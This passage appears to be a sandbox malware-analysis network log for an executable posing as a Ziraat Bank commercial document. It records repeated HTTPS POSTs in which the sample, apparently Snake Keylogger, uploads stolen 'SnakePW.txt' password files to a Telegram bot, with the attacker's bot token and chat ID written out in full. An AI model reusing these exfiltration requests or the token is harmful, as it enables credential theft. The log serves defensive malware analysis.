                                      2024-09-26 09:00:26 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 35 33 39 63 32 64 32 35 39 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce539c2d259b7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:26 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:26 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:26 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 32 36 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35843,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341226,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      44192.168.2.449793149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:28 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce5811bb32d74
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:28 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 35 38 31 31 62 62 33 32 64 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce5811bb32d74Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:28 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:28 GMT
                                      Content-Type: application/json
                                      Content-Length: 513
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:28 UTC513INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 32 38 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35844,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341228,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      45192.168.2.449794149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:29 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce5eb8eeed2ce
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:29 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 35 65 62 38 65 65 65 64 32 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce5eb8eeed2ceContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:29 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:29 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:29 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 32 39 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35845,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341229,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      46192.168.2.449795149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:30 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce649becf6bdd
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:30 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 36 34 39 62 65 63 66 36 62 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce649becf6bddContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:30 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:30 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:30 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 33 30 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35846,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341230,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      47192.168.2.449796149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:31 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce687bb2f29e9
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:31 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 36 38 37 62 62 32 66 32 39 65 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce687bb2f29e9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:31 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:31 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:31 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 33 31 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35847,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341231,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      48192.168.2.449797149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:32 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce6cd32a6800f
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:32 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 36 63 64 33 32 61 36 38 30 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce6cd32a6800fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:32 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:32 GMT
                                      Content-Type: application/json
                                      Content-Length: 518
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:32 UTC518INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 33 32 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35848,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341232,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      49192.168.2.449798149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:33 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce717b031d71a
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:33 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 31 37 62 30 33 31 64 37 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce717b031d71aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:33 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:33 GMT
                                      Content-Type: application/json
                                      Content-Length: 516
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:33 UTC516INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 33 33 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35849,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341233,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      50192.168.2.449799149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:34 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce75dc8dac505
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
